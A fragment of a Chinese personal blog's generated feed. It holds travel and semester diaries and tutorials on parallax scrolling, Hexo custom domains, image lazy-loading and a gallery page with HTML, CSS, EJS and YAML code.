    ​ 这时候人已经有点疲惫了,看攻略觉得南昌晚上比较好玩,于是决定回民宿睡个午觉。

    12:25 江西美术馆

    红彤彤

    ​ 中转地铁途中打卡一下江西美术馆。

    12:27 八一起义纪念塔

    八一

    ​ 中转地铁途中打卡一下八一起义纪念塔。

    江西美术馆

    ​ 在纪念碑底下拍美术馆。

    12:40 福州路

    FUZHOU RD

    ​ 回民宿开躺!

    ]]>
    @@ -3424,7 +3424,7 @@ /posts/Web-%E8%A7%86%E5%B7%AE%E6%BB%9A%E5%8A%A8/ - 资源

    演示

    代码

    <!DOCTYPE html>
    <html lang="en">
    <head>
    <title>Parallax Scrolling Website</title>
    <link rel="stylesheet" href="style.css">
    </head>
    <body>
    <header>
    <a href="#" class="logo">Logo</a>
    <ul>
    <li><a href="#" class="active">Home</a></li>
    <li><a href="#">About</a></li>
    <li><a href="#">Work</a></li>
    <li><a href="#">Contact</a></li>
    </ul>
    </header>
    <section>
    <img src="images/stars.png" id="stars">
    <img src="images/moon.png" id="moon">
    <img src="images/mountains_behind.png" id="mountains_behind">
    <h2 id="text">Moon Light</h2>
    <a href="#sec" id="btn">Explore</a>
    <img src="images/mountains_front.png" id="mountains_front">
    </section>
    <div class="sec" id="sec">
    <h2>Parallax Scrolling Effects</h2>
    <p>....</p>
    </div>
    <script>XXX</script>
    </body>
    </html>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: 'Poppins', sans-serif;
/* 当用户手动导航或 CSSOM scrolling API 触发滚动时,平滑过渡而非瞬间跳转 */
    scroll-behavior: smooth;
    }

    body {
    min-height: 100vh;
    overflow-x: hidden;
    background: linear-gradient(#2b1055,#7597de);
    }

    header {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    padding: 30px 100px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    z-index: 10000;
    }

    header .logo {
    color: #fff;
    font-weight: 700;
    text-decoration: none;
    font-size: 2em;
    text-transform: uppercase; /* 大写 */
    letter-spacing: 2px; /* 字符间距 */
    }

    header ul {
    display: flex;
    justify-content: center;
    align-items: center;
    }

    header ul li {
    list-style: none;
    margin-left: 20px;
    }

    header ul li a {
    text-decoration: none;
    padding: 6px 15px;
    color: #fff;
    border-radius: 20px;
    }

    header ul li a:hover,
    header ul li a.active {
    background: #fff;
    color: #2b1055;
    }

    section {
    position: relative;
    width: 100%;
    height: 100vh;
    padding: 100px;
    display: flex;
    justify-content: center;
    align-items: center;
    overflow: hidden;
    }

    section::before {
    content: '';
    position: absolute;
    bottom: 0;
    width: 100%;
    height: 100px;
    background: linear-gradient(to top, #1c0522, transparent);
    z-index: 1000;
    }

    section img {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    /* object-fit CSS 属性指定可替换元素(例如:<img> 或 <video>)的内容应该如何适应到其使用高度和宽度确定的框。*/
    object-fit: cover;
    pointer-events: none;
    }

    section img#moon {
    /* mix-blend-mode CSS 属性描述了元素的内容应该与元素的直系父元素的内容和元素的背景如何混合。*/
    mix-blend-mode: screen;
    }

    section img#mountains_front {
    z-index: 10;
    }

    #text {
    position: absolute;
    right: -350px;
    color: #fff;
    white-space: nowrap;
    font-size: 7.5vw;
    z-index: 9;
    }

    #btn {
    text-decoration: none;
    display: inline-block;
    padding: 8px 30px;
    border-radius: 40px;
    background: #fff;
    color: #2b1055;
    font-size: 1.5em;
    z-index: 9;
    transform: translateY(100px);
    }

    .sec {
    position: relative;
    padding: 100px;
    background: #1c0522;
    }

    .sec h2 {
    font-size: 3.5em;
    margin-bottom: 10px;
    color: #fff;
    }

    .sec p {
    font-size: 1em;
    color: #fff;
    }
    let stars = document.getElementById('stars')
    let moon = document.getElementById('moon')
    let mountains_behind = document.getElementById('mountains_behind')
    let text = document.getElementById('text')
    let btn = document.getElementById('btn')
    let mountains_front = document.getElementById('mountains_front')
    let header = document.querySelector('header')

    window.addEventListener('scroll', function(){
    let value = window.scrollY;
    stars.style.left = value * 0.25 + 'px'
    moon.style.top = value * 1.05 + 'px'
    mountains_behind.style.top = value * 0.5 + 'px'
    mountains_front.style.top = value * 0 + 'px'
    text.style.marginRight = value * 4 + 'px'
    text.style.marginTop = value * 1.5 + 'px'
    btn.style.marginTop = value * 1.5 + 'px'
    header.style.top = value * 0.5 + 'px'
    })

    这段 JavaScript 代码实现了视差滚动效果。具体来说:

• let 关键字声明了一些变量,如 stars、moon、mountains_behind 等,使用 document.getElementById() 方法获取了每个元素的引用。
• window.addEventListener('scroll', function(){...}) 给窗口添加了一个滚动事件监听器。当用户滚动页面时,回调函数将被触发。
• 在回调函数中,通过 window.scrollY 获取当前滚动的垂直距离,并将其赋值给变量 value。
• 接下来,根据 value 的值,通过修改元素的样式属性来实现视差滚动效果。例如,stars.style.left 将 stars 元素的左侧偏移量设置为 value * 0.25 + 'px';moon.style.top 将 moon 元素的顶部偏移量设置为 value * 1.05 + 'px',以此类推。
    • 通过修改不同元素的样式属性,可以创建出不同速度和方向的滚动效果,从而实现视差效果。

    总体来说,这段代码使得页面中的一些元素在用户滚动页面时以不同的速度和方向移动,从而营造出立体感和动态效果。
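
​ 个人补充一个小优化思路(非原教程内容,仅为示意):在 scroll 回调里直接改 top / margin 会频繁触发重排,改用 transform 并配合 requestAnimationFrame 每帧只计算一次会更顺滑。沿用上文已获取的元素变量:

// 示意:用 transform 代替 top/margin,并用 requestAnimationFrame 合并计算
let ticking = false;
window.addEventListener('scroll', function () {
if (ticking) return;
ticking = true;
requestAnimationFrame(function () {
let value = window.scrollY;
stars.style.transform = 'translateX(' + value * 0.25 + 'px)';
moon.style.transform = 'translateY(' + value * 1.05 + 'px)';
mountains_behind.style.transform = 'translateY(' + value * 0.5 + 'px)';
ticking = false;
});
});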

    ]]>
    @@ -3449,7 +3449,7 @@ /posts/Diary-10-%E5%80%92%E4%B8%80/ - 前言
            

    东湖公园
    东湖公园 东湖公园 银杏大道 银杏大道 古莲花池
    孔子像

    ​ 研二上结束了!来做一个超长的延时摄影吧!记录一下这个不一样的冬天🥰。

    ​ 如果把这个学期的每一天都看作宽度为 $16$ 像素的长条,那么整个学期就是一张 $2192\times 2192$ 的图片了。


​ 气候播报——全,直接从气象站里导表吧:保定市历史天气 (rp5.ru)、福州市历史天气 (rp5.ru),然后一阵 py!

    import pandas as pd
    import matplotlib.pyplot as plt
    from datetime import datetime
    import seaborn as sns

# rp5.ru 导出的 xls 前 6 行是说明信息,跳过;数据按时间倒序,用 [::-1] 翻回正序
df = pd.read_excel(r'BD.xls', skiprows=6).rename_axis(None)
    time_list = df['当地时间 保定市'][::-1].tolist()
    time_list = [datetime.strptime(x, '%d.%m.%Y %H:%M') for x in time_list]
    temp_list = df['T'][::-1].tolist()

    df2 = pd.read_excel(r'FZ.xls', skiprows=6).rename_axis(None)
    time_list2 = df2['当地时间 福州市'][::-1].tolist()
    time_list2 = [datetime.strptime(x, '%d.%m.%Y %H:%M') for x in time_list2]
    temp_list2 = df2['T'][::-1].tolist()

    sns.set_style("whitegrid")
plt.rcParams['font.family'] = 'SimHei'  # 中文字体,避免图例和坐标轴乱码

    plt.plot(time_list, temp_list, label="保定")
    plt.plot(time_list2, temp_list2, label="福州")

    plt.xlabel('时间')
    plt.ylabel('温度')
plt.xticks(time_list[::200])  # 刻度太密,每 200 个点取一个
    plt.legend()
    plt.show()

    全学期温度曲线

    正文

    1.8

​ 开始背诵《滕王阁序》!据说背完《滕王阁序》就可以免票进滕王阁。每天大早上跑去实验室,趁没人的时候背一段,一周时间大概背完了。

    豫章故郡,洪都新府

    ​ 比起《滕王阁序》里最有名的“落霞与孤鹜齐飞,秋水共长天一色”,我更喜欢后面的这句“关山难越,谁悲失路之人?萍水相逢,尽是他乡之客”。

    ​ 王勃在他二十四岁这年写出了这么优美的文章,而我二十四岁这年写屎一样的论文,喝汤一样😇。


    今天晚上七点在 326 开会,汇报一下近期工作和寒假安排,大家有什么需要说的提前准备好。

    ​ 这学期最后一次组会了!导师还请我们吃糖葫芦🥳。

    pro 神:✌

    1.9

    江西瓦罐汤

    ​ 品尝一下冀大的江西瓦罐汤,到时候看它是否正宗🤔。

    ​ 校园里陆陆续续地出现了拿着行李箱往外走的人,食堂的商铺也陆陆续续收工,寒假就要来到了!


大家啥时候有时间,咱们啥时候一起吃个饭呀@全体成员

    ​ 临走前,实验室决定最后聚一次餐。

    那咱们就周五晚上,具体时间和地点我到时候再通知哈@全体成员

    1.12

    咕咾肉 西红柿疙瘩汤 大拌菜 豆腐煲 铁锅炖杂鱼 辣子鸡 锅包肘子 驴肉饼 烧鸡

    ​ 师兄挑了一家河北特色饭馆——淀里船宴 · 夜宴。我想这个淀是白洋淀的淀。

    • 点了一份咕咾肉,师弟居然说这道菜让他想起了荔枝肉?震惊我😧。
• 点了一份辣子鸡,伟哥说这个辣子鸡一点都不辣,鸡肉、麻花甚至辣椒都不辣!结果师兄吃了个辣椒直接呛飞😇。
    • 点了一份铁锅炖杂鱼,上面还贴着玉米饼,巨干。其他人觉得鱼太腥了,但我觉得还好,最关键是它很有白洋淀的特色🧐。
    • 还点了保定特色的驴肉!还有师兄至今不敢吃驴……感觉吃得比之前吃的驴肉都香🤗。

    蒋百里

    ​ 吃完后同门三人边走边聊天走回宿舍(pro 神翘掉了这次聚餐😭!)。

    ​ 又是一天雾霾天,逐渐也习惯了🙃。

    1.16

    拜拜 324!

    ​ 最后剩三天,整理下实验室吧,在 324 的生活要告一段落了。

    1.17

    定州!

    1.19

    ​ 爷润了。

    ]]>
    @@ -3476,7 +3476,7 @@ /posts/Hexo-%E7%BB%99%E5%8D%9A%E5%AE%A2%E6%8F%90%E6%8F%90%E9%80%9F%EF%BC%81/ - 正文

    换域名

    github.io 这个域名在冀大校园网会直接被墙(估计是 DNS 污染?),换个域名让冀大校园网里也能访问!

    webp

    ​ 买一个域名:gz-metal-cell.top

    ​ 要实名认证才可以使用!进去操作一番,直到审核通过域名可以解析为止。

    webp

    ​ 设置主机记录:

    webp

    pro 神这么说道:

Github Pages 提供了 Custom domain 服务,

在 username.github.io 仓库下 Settings -> Pages -> Custom domain 填入域名 blog.promefire.top。保存后会在根目录生成 CNAME 文件,里面保存域名配置信息。

    webp

    ​ 等待 DNS check successful,顺便把 Enforce HTTPS 也开了。

    ​ 仓库根目录就会创建一个 CNAME 文件,内容即为 blog.gz-metal-cell.top,这个文件在本地 source/ 下也转存一份,不然每次推送这个 CNAME 又会没了……

    webp

    ​ 现在,访问 https://gz-metal-cell.github.io 会自动跳转至 https://blog.gz-metal-cell.top/,就可以绕开冀大的防火墙了,真是太棒了!

    图片懒加载

    pro 神这么说道:

    ​ 懒加载又称延迟加载。开启后,当图片或评论插件滚动到可见范围内才会加载,可以大幅提高打开网页的速度。

1. 新增 hexo-lazyload-image 模块

    npm install hexo-lazyload-image --save

2. 在主目录配置文件 _config.yml 中增加配置

    # 图片懒加载
    lazyload:
    enable: true
    onlypost: false # optional
    loadingImg: /images/loading.webp # optional eg ./images/loading.gif
    isSPA: false # optional
    preloadRatio: 5 # optional, default is 1

​ 从“loading GIF 图片生成 - 在线 loading 图片制作工具 intoGIF”整一个 loading 的 gif,再 PS 调一调,再用“GIF 转 WEBP - 在线转换图像文件 (aconvert.com)”转成 webp 格式,看起来不错,只要 12 KB!

    webp

    ​ 进主题,把图标啥的小图片打上 no-lazy 标签,我们并不需要懒加载这些内容:

    <img no-lazy src="XXX" />

    与 Masonry 冲突

    ​ 解决一下懒加载与 Masonry · Layout (desandro.com) 布局的冲突,原本是这么处理的:

    // layout Masonry after each image loads
    $grid.imagesLoaded().progress(function() {
    $grid.masonry();
    });

    ​ 改成:

    window.imageLazyLoadSetting = {
    onImageLoaded: function() {
    $grid.masonry();
    }
    };

​ 这样,懒加载就能与瀑布流插件 Masonry 兼容了!

    与 fancybox 冲突

​ 这个插件的原理是把 img 的 src 改成 data-original,因此需要修改创建 fancybox 的逻辑:

$('#article img').each(function () {
if ($(this).parent().hasClass('fancybox')) return;
if ($(this).hasClass('no-fancybox')) return;
var alt = this.alt;
// 优先取懒加载插件存放的 data-original,取不到再退回 src
var src = $(this).attr('data-original') == null ? this.src : $(this).attr('data-original');
$(this).wrap(
'<a ' +
'class="fancybox" ' +
'href="' + src + '" ' +
'data-caption="' + alt + '" ' +
'data-fancybox="gallery" ' +
'data-thumb="' + src + '">' +
'</a>');
});
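
​ 顺带补充一下懒加载本身的原理(仅为示意,并不是 hexo-lazyload-image 的真实实现):页面先渲染占位图,等 <img> 进入视口再把 data-original 写回 src。现代浏览器用 IntersectionObserver 就能很轻量地做到:

// 极简示意:假设图片写成 <img src="loading.webp" data-original="真实地址">
const io = new IntersectionObserver(function (entries) {
entries.forEach(function (entry) {
if (!entry.isIntersecting) return;
const img = entry.target;
img.src = img.dataset.original; // 进入视口才发起真正的图片请求
io.unobserve(img); // 每张图只需处理一次
});
});
document.querySelectorAll('img[data-original]').forEach(function (img) { io.observe(img); });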

    其他工具

    ​ ChatGPT 这么说道:

    要使用 Python 将 PNG 文件转换为 WebP 格式,你可以使用 Pillow 库。请确保你已经安装了 Pillow 库。

    以下是一个简单的示例代码:

    from PIL import Image

    def convert_png_to_webp(input_path, output_path):
    # 打开 PNG 文件
    image = Image.open(input_path)

    # 将 PNG 文件转换为 WebP 格式
    image.save(output_path, "webp")

    # 调用函数进行转换
    convert_png_to_webp("input.png", "output.webp")

    在上面的代码中,convert_png_to_webp 函数接受输入路径(PNG 文件)和输出路径(WebP 文件),并将 PNG 文件转换为 WebP 格式。

    请注意,使用 WebP 格式需要安装 libwebp 库。如果你在使用 Pillow 之前没有安装 libwebp 库,你可能会遇到错误。你可以根据你的操作系统和 Python 版本选择合适的安装方法。

    pro 神这么说道:

    ]]>
    @@ -3528,7 +3528,7 @@ /posts/Diary-9-%E5%80%92%E4%BA%8C/ - 前言
            

    jpg

    梧桐与银杏

    ​ 这是这学期倒二篇周记了!坚持住!勇士!相信圣光会在最需要你的时候显现🤩🤩🤩!

    ​ 保定气候播报:

    正文

    12.28

    ​ 想着给自己的博客增加更多实用的功能,看了下隔壁 promefire 的博客,决定抄一些牛逼的功能回去,开扒😍😍😍!扒得 promefire 脸都绿了。

    png

    promefire: 😻😻😻😱

    12.30

    ​ 一觉醒来,雾凇沆砀。准确来讲,我觉得应该是霾凇🙃。

    ​ 一年中最冷的时候已经过去了!

    jpg

    千树万树梨花开

    ​ 雾凇,也称树挂或雾冻,是一种在天气寒冷的地方出现的白色不透明晶体。在寒冷的北方,临近地表水的地方,由于水从湖面蒸发,在空中形成水雾,而又因为寒冷的空气,雾中的水粒子在树枝上凝结、结霜并不断积聚,树枝披上了由小冰晶组成的白色不透明的外衣,产生了类似雪后的景观,非常美丽,犹如梨花盛开。雾凇一词最早出现于南北朝时代南朝宋吕忱所编的《字林》里,其解释为:“寒气结冰如珠见日光乃消,齐鲁谓之雾凇。”

    ​ 树枝上长满了白色的针刺,但是摸起来细细软软的。

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    ​ 东湖公园开了冰雪嘉年华,有点像颐和园湖上的各种滑冰项目。

    jpg

    冰雪嘉年华

    ​ 灯笼寓意着新年即将来到了,再见 2023!

    jpg

    新年的气氛

    jpg

    嘻嘻哈哈项目

    12.31

    ​ 跨年夜到了,这将是在北方第一次过的公历新年😇。

    ​ 去未来石看看北方特色打铁花。

    jpg

    开封打铁花

    ​ 舍友在永辉买了红酒和烧鸡,打算庆祝一番。

    不错不错

    特别篇——舞台剧——《笨蛋 promefire 买酒不买开瓶器》

    红酒与烧鸡
    jpg

    ​ 这是一个美好的跨年夜,年轻的凡哥和杰哥买来一瓶红酒和一份烧鸡,决定开始享受这个夜晚。看看这瓶美丽的红酒!它散发着诱人的深红色泽,仿佛一匹醉人的夕阳染红了整个酒瓶。再看看这份迷人的烧鸡,它饱满的金黄色皮肤反射着温暖的灯光,令人联想起柔软的麦田与夏日的太阳。

    插在酒瓶上的筷子
    jpg

    ​ 在这个令人扼腕的时刻,年轻的凡哥和杰哥突然意识到他们忘了买开瓶器。面对这一窘境,他们的眉头紧锁,眼神闪烁着无奈和焦急。然而,他们不愿放弃享受美酒的机会,心生一计。凡哥毅然拿出手中的筷子,坚定地插入软木塞中,决心用自己的“智慧”打开这瓶扣人心弦的红酒。

试图将筷子锤下
    jpg

    ​ 软木塞和玻璃瓶身之间似乎形成了一道无法逾越的鸿沟,阻挡着红酒的主人品尝美酒的机会。凡哥拿出一把锤子,试图将筷子砸穿软木塞。但是,这个方法也没有奏效。

    大力出奇迹!
    jpg

    ​ 筷子被软木塞卡住,就连拔出它都变得困难。凡哥决定采取更加强力的方式,用尽全力将筷子拔出,可是依然不成功。

    又一根筷子
    jpg

    ​ 凡哥选择插入了第二根筷子!然而不幸的是,第二根筷子也插在了软木塞上拔不出来!这简直糟糕透了,比隔壁本杰明老爷爷的旧轮胎还要糟糕。他们意识到这个问题比他们想象的更加棘手。

    算球吧最后还是砸碎了
    jpg

    ​ 年轻的凡哥和杰哥感到非常失望和沮丧,但仍然不想放弃。于是,凡哥决定采用一种更激进的方法来打开酒瓶。凡哥用力将瓶口向墙壁撞击。经过多次努力,瓶口终于被打碎了。虽然这并不是最理想的方法,但他们最终还是成功地品尝到了这瓶美酒,而且在这个过程中也锻炼了自己的“毅力”和“创造力”。

    阳哥:我谢谢你
    jpg

    ​ 这真是个令人尴尬的情节。看来凡哥和杰哥的幸运并不持久。他们正在享受美酒时,关某不慎将红酒洒在桌子上,整个桌面都被染上了红色。这突如其来的意外无疑给愉快的氛围蒙上了一层阴影。或许他们会笑着解决这个问题,毕竟美好的时光不应该因为一点小事而被打扰。

    美酒
    jpg

    ​ 收拾完桌面上的红酒,他们决定不再让这个小意外影响他们的心情。他们取出干净的酒杯,重新倒满红酒。尽管桌子上曾经一片混乱,但现在他们围坐在一起,准备享用这份美酒。
    ​ 他们举起酒杯,相互祝福,并感激这样难得的时刻。他们轻轻品味着红酒的香气,让酒液在舌尖舒展开来。随着酒液在口中流淌,他们感受到了红酒的浓郁和复杂的口感。喝下每一口,他们的味蕾都得到了满足,心情也逐渐变得愉悦起来。

    这真是一个艺术品!
    jpg

    ​ 破碎的瓶口上仍塞着软木塞,那根筷子依然笔直地立在那里。真傻逼啊!


    氛围感顿时就没了

    1.1

    ​ 新年好!宿舍躺一天!

    1.5

    跟伟哥私奔了

    ​ 该买票回去了!

    ​ 石家庄飞福州的时间点看上去都不是很好,于是决定中转一下南昌,去打卡江南三大名楼(2 / 3),冲!

    赣了
    又可以吃赣面了

    1.6

    ​ 记录一下吃小笼包还要蘸辣酱的阳哥😇。阳哥还说区区江西南昌,根本不算辣。

    jpg

    这才是黑暗料理!

    ​ 晚上是琪琪的生日 Party,祝琪琪生日快乐!

    ​ 琪琪还因为我特意点了些不辣的,感动捏🥰。我与吃辣的阳哥势不两立😡!

    jpg

    永远童真🤭

    jpg

    654 抽象三人组

    ​ 酒店还特意准备了生日 Party,找了个财神爷跳科目三。

    jpg

    怎么会有人拿板面当长寿面?
    ]]>
    @@ -3555,7 +3555,7 @@ /posts/Hexo-%E5%8D%9A%E5%AE%A2%E7%9B%B8%E5%86%8C%E5%8A%9F%E8%83%BD%E7%9A%84%E5%BC%80%E5%8F%91/ - 前言

    ​ 拍的照片多了,设计一个相册功能便于更直观地展示拍的各种好看的照片😇!


    ​ 参考资料:

    正文

    子链接的创建

    ​ 在 hexo 项目的 source 文件中,新建一个 galleries 文件夹,再在里面放上 index.md(可以使用命令行),

hexo new page galleries

    ​ 渲染博客的时候就会渲染 /galleries 这个网址,如 相册-Zi-Zi’s Journey

    png

    ​ 同样地,如果在 galleries 里放上其它文件夹,文件夹里再放上 index.md,渲染博客的时候就会再渲染下一级的网址,如:…/…/…/…/galleries/研究生 。

    png

    ​ 继续套娃,套到相册(layout 为 gallery)为止:

    png

    相册的入口

    ​ 设置好了子链接就要设置好入口,一般在主题的 _config.yml 中配置。

    # 导航名称
    menus_title:
    home: 主页
    archives: 统计
    categories: 类别
    tags: 标签
    galleries: 相册
    links: 链接
    about: 关于

    # 导航
    menus:
    home: /
    archives: /archives
    categories: /categories
    tags: /tags
    galleries: /galleries
    links: /links
    about: /about

    ​ 渲染博客,导航栏就多了一项 相册,且点进去能够正确转入 /galleries

    png

    ​ 其它有关页面的参数也设置一下:

    # 每个页面的展示的图标和一句话
    headers:
    home: {
    message: "居然被你找到了这里!",
    icon: "/images/logo.png",
    cover: "#f5f9fd"
    }
    archives: {
    # 这里会替换掉两个变量{ year 年,number 总数 } 当然也可以不写这两个变量
    message: "居然用了 year 年一共才写了 number 篇文章!",
    icon: "/images/archives.svg",
    cover: "#f5f9fd"
    }
    categories: {
    message: "好像也没分几类",
    icon: "/images/categories.svg",
    cover: "#f5f9fd"
    }
    tags: {
    message: "这里是一些展示的标签",
    icon: "/images/tags.svg",
    cover: "#f5f9fd"
    }
    galleries: {
    message: "有趣的相册~(施工中)",
    icon: "/images/galleries.svg",
    cover: "#f5f9fd"
    }
    links: {
    message: "给我读过的学校递一杯卡布奇诺~",
    icon: "/images/links.svg",
    cover: "#f5f9fd"
    }

    ​ 手撸一个风格相近的图标:

    png

    创建相册页面的布局

    ​ 编辑创建的 index.md,头部信息是由 yaml 语法组成的:

    title: 相册
    date: 2023-12-29 09:46:29
    type: galleries
    layout: galleries

​ 以自己所用主题为例,这表示这个页面将使用 galleries 布局渲染。

    ​ 我设计了两种页面:

    • galleries 用于展示相册
    • gallery 用于展示相册里的图片

​ 在主题对应的文件夹里创建 galleries.ejs 和 gallery.ejs,页面就会按照对应的 .ejs 文件渲染:

    png

    galleries 设计

    index.md

​ 给 layout 为 galleries 的 index.md 设计变量,这些变量在 galleries.ejs 中会以 page.XXX 的形式读取:

    title: 相册
    date: 2023-12-29 09:46:29
    type: galleries
    layout: galleries
    layout_style: block
    comments: false
    galleries:
    - {title: "研究生", description: "Tell me 他乡的困难会不会比它鼓山高?", cover: "/images/gallery_covers/研究生.jpg"}
    - {title: "本科", description: "闽江江水都流向,流向长乐的海……", cover: "/images/gallery_covers/本科.jpg"}
    - {title: "小时候", description: "我让过去的自己只留在,安静的白马河。", cover: "/images/gallery_covers/小时候.jpg"}
    • title 标题
    • date 时间,但在这里我并没用到
    • type 页面属性
    • layout 布局属性
• layout_style 布局风格,我这里设计了两种风格:block 和 card
• galleries 相册列表,列表里的内容必须符合子文件夹的属性(我没有想到如何自动遍历子文件夹并获取相关参数的办法,只能先手动挡了;本列表后面附了一个自动生成骨架的思路草稿。)
      • title 相册标题
      • description 相册描述
      • cover 相册封面
      • cover_style 我这里没设置,可以控制封面图片的 style
    • comments 是否打开评论功能
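
​ 附上面提到的思路草稿(个人假设的辅助脚本,未实际接入主题):用 Node 扫一遍 source/galleries 下的子文件夹,批量生成 galleries 列表的骨架,description 和 cover 再手动补:

// gen-galleries.js:输出 yaml 骨架,手动粘回 index.md
const fs = require('fs');
const path = require('path');

const root = path.join('source', 'galleries');
fs.readdirSync(root, { withFileTypes: true })
.filter(function (d) { return d.isDirectory(); })
.forEach(function (d) {
console.log('  - {title: "' + d.name + '", description: "XXX", cover: "/images/gallery_covers/' + d.name + '.jpg"}');
});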

    galleries.ejs

galleries.ejs 的内容参考如下:(修改 galleries.ejs 的内容要重新生成博客才可以重新渲染,如果调试不方便,可以将代码以 <%- partial('_partial/XXX') %> 的形式拆到其它文件里以便于调试)

    <%- partial('_partial/header',{name:'galleries'}) %>

    <div class="galleries">
    <%- partial('_widget/header_body',{message: page.headers ? page.headers : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
    <div class="main">
    <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>" id="content">
    <% page.galleries.forEach(function(item) { %>
    <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>-content">
    <a class="img-container" href="<%= item.title %>">
    <div class="photo-frames">
    <img style="<%- item.cover_style || '' %>" src="<%= item.cover ? item.cover : theme.default_cover %>" alt="Cover">
    </div>
    <p class="title"><%= item.title %></p>
    </a>
    <div class="description-container"><p><%= item.description %></p></div>
    </div>
    <% }); %>
    <div id="gitalk-container"></div>
    </div>
    </div>
    </div>

    ​ 就是将读取到信息展示在页面上的逻辑。

    galleries.less

​ 创建并编写对应的 galleries.less 如下(记得在主题的样式入口文件里引用它):

    .galleries{
    .main {
    display: flex;
    flex-grow: 1;
    flex-basis: auto;
    flex-direction: column;
    margin-top: -64px;
    .post-block{
    padding: 0 calc((100% - 1160px)/2);
    margin-bottom: 50px;
    &-content{
    margin: 20px 100px 60px 100px;
    text-decoration: none;
    height: 240px;
    justify-content: center; /* 添加此行以实现水平居中对齐 */
    display: grid;
    grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
    grid-gap: 10px; /* 控制子容器之间的间距 */
    position: relative;
    top: 0px;
    transition: all .5s ease-in-out;
    -moz-transition: all .5s;
    -webkit-transition: all .5s;
    -o-transition: all .5s;
    &:hover {
    top: -15px;
    }
    .img-container{
    justify-content: center;
    display: flex;
    transform: rotate(-5deg);
    transition: transform ease-in-out 0.5s;
    &:hover {
    transform: rotate(-10deg);
    }
    .photo-frames{
    width: 200px;
    border: 10px solid #FFF; /* 相框的边框样式和颜色 */
    border-radius: 5px;
    background: #FFF;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
    img{
    border-radius: 2px;
    margin-top: 10px;
    width: 100%;
    height: 75%;
    object-fit: cover;
    }
    }
    }
    .title{
    bottom: 15px;
    position: absolute;
    font-weight: bold;
    text-decoration: none;
    color: @textColorTheme;
    font-size: 22px;
    font-weight: 500;
    }
    .description-container{
    margin-top: 80px;
    p{
    text-indent: 2em;
    font-size: 20px;
    position: absolute;
    }
    }
    }
    @media screen and (max-width:660px) {
    &-content{
    margin: 20px;
    padding: 20px;
    .title{
    bottom: 5%;
    }
    .description-container{
    p{
    font-size: 18px;
    }
    }
    }
    }
    @media screen and (max-width:489px) {
    &-content{
    height: 320px;
    margin-bottom: 40px;
    .img-container{
    .photo-frames{
    width: 60vw;
    }
    }
    .description-container{
    margin-top: 40px;
    }
    }
    }
    }

    .post-card{
    display: flex;
    max-width: 100%;
    padding: 0 calc((100% - 1200px)/2) 40px;
    flex-wrap: wrap;
    justify-content: center;
    align-items: stretch;
    margin-top: -64px;
    &-content{
    margin: 20px 40px 80px 40px;
    text-decoration: none;
    height: 400px;
    justify-content: center; /* 添加此行以实现水平居中对齐 */
    display: grid;
    grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
    grid-gap: 10px; /* 控制子容器之间的间距 */
    position: relative;
    top: 0px;
    transition: all .5s ease-in-out;
    -moz-transition: all .5s;
    -webkit-transition: all .5s;
    -o-transition: all .5s;
    &:hover {
    top: -15px;
    }
    .img-container{
    justify-content: center;
    display: flex;
    transform: rotate(-5deg);
    transition: transform ease-in-out 0.5s;
    &:hover {
    transform: rotate(-10deg);
    }
    .photo-frames{
    width: 220px;
    border: 10px solid #FFF; /* 相框的边框样式和颜色 */
    border-radius: 5px;
    background: #FFF;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
    img{
    border-radius: 2px;
    margin-top: 10px;
    width: 100%;
    height: 75%;
    object-fit: cover;
    }
    }
    }
    .title{
    bottom: 20px;
    position: absolute;
    font-weight: bold;
    text-decoration: none;
    color: @textColorTheme;
    font-size: 22px;
    font-weight: 500;
    }
    .description-container{
    margin-top: 40px;
    p{
    text-indent: 2em;
    font-size: 20px;
    position: absolute;
    }
    }
    }

    @media screen and (max-width:640px) {
    &-content{
    margin: 80px 20px;
    padding: 20px;
    height: 400px;
    .title{
    bottom: 5%;
    }
    .img-container{
    .photo-frames{
    width: 60vw;
    }
    }
    .description-container{
    p{
    font-size: 18px;
    }
    }
    }
    }
    }
    }
    }

    演示

    ​ 大功告成,对应的 block 风格页面:相册-Zi-Zi’s Journey

    png

    \研究生\index.md 的布局:

    title: 研究生
    date: 2023-12-29 14:47:00
    type: galleries
    layout: galleries
    layout_style: card
    headers: 大河之北
    galleries:
    - {title: "福州", description: "WAIYA! 鼓山脚 南门兜 我如鱼得水", cover: "/images/gallery_covers/研究生/福州.jpg"}
    - {title: "保定-春夏", description: "保定没有爱情,只有他蜡笔还不完的饥荒。", cover: "/images/gallery_covers/研究生/保定-春夏.jpg"}
    - {title: "保定-秋冬", description: "雪花飘飘,北风萧萧。", cover: "/images/gallery_covers/研究生/保定-秋冬.jpg"}
    - {title: "石家庄", description: "直到大厦崩塌", cover: "/images/gallery_covers/研究生/石家庄.jpg"}
    - {title: "厦门", description: "再鼓楼润湖里搞涢涢!", cover: "/images/gallery_covers/研究生/厦门.jpg"}
    - {title: "武汉", description: "这辈子又可以见到小迷糊了!", cover: "/images/gallery_covers/研究生/武汉.jpg"}
    - {title: "雄安", description: "千年大计,国家大事。", cover: "/images/gallery_covers/研究生/雄安.jpg"}
    - {title: "天津", description: "天天乐道,津津有味。", cover: "/images/gallery_covers/研究生/天津.jpg"}
    - {title: "正定", description: "太能走了凡哥!", cover: "/images/gallery_covers/研究生/正定.jpg"}

    ​ 对应的 card 风格页面:

    png

    index.md

​ 同理,给 layout 为 gallery 的 index.md 设计变量,这些变量在 gallery.ejs 中会以 page.XXX 的形式读取:

    title: 保定-秋冬
    date: 2023-12-29 14:47:00
    type: gallery
    layout: gallery
    description: 你们南方人的四季是不完整的。——阿杰
    imgs:
    - {title: "积雪的人行道", src: ../../../XXX.jpg}
    - ...
    - {title: "和美保定", src: ../../../XXX.jpg}
    comments: true
    • title 标题

    • date 时间,但在这里我并没用到

    • type 页面属性

    • layout 布局属性

    • description 相册描述

    • imgs 定义的一个图片类(暂且先设计一个变量)

      • title 图片的描述
      • src 对应的 src 地址,可以是绝对地址也可以是相对地址
